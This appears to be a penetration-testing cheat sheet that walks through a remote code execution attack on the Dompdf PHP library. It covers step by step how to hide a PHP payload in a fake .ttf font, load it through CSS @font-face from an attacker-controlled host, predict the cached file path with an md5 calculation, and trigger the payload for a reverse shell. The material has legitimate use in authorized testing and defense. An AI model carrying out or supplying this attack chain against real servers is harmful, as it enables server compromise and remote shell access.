Dompdf RCE
Dompdf is an HTML to PDF converter for PHP. It may be vulnerable to remote code execution or SSRF.
- [dompdf](https://github.com/dompdf/dompdf]
- [exploiting-rce-vulnerability-dompdf](https://www.optiv.com/insights/source-zero/blog/exploiting-rce-vulnerability-dompdf)
Exploitation
1. Create Malicious Font
First off, we need to prepare the malicious .ttf file.
Here, we find the .ttf file in our local system and copy it to the current directory and change the extention ttf to php because we want to execute PHP script.
Then add the PHP payload at the end of the file.
2. Create Malicious CSS
Next we create a malicious CSS that load the above “evil.php”.
@font-face {
font-family: 'evil';
src: url('http://10.0.0.1:8000/evil.php');
font-weight: 'normal';
font-style: 'normal';
}
3. Host PHP & CSS
Now we have the two files in current working directory.
Start web server to host them.
4. Send Request
In target website, send request to upload the HTML as below.
Our “evil.php” is uploaded to /dompdf/lib/fonts/<font_name>_<font_weight/style>_<md5>.php.
For example, /dompdf/lib/fonts/evil_normal_2cddaeb743b6aeb5638ac0ac93c4c9f6.php.
To get the md5 hash, we can calculate it by the following command.
Also we can use Python hashlib module.
python3
>>> import hashlib
>>> hashlib.md5("http://10.0.0.1:8000/evil.php".encode("UTF-8")).hexdigest()
>>> 2cddaeb743b6aeb5638ac0ac93c4c9f6
5. Execute Malicious PHP via Cached File
Finally we get the cached file path as above so we can get the cached PHP file that executes malicious code.
For reverse shell, we need to start a listener in local.
Now access to the cached PHP file.
We get a shell in local terminal.
Exploitation (Automatically)
Also we can exploit with the repository.
Modify CSS and PHP depending on your situation. Please see the previous "Exploitation" section for the details of each file.
Then send request.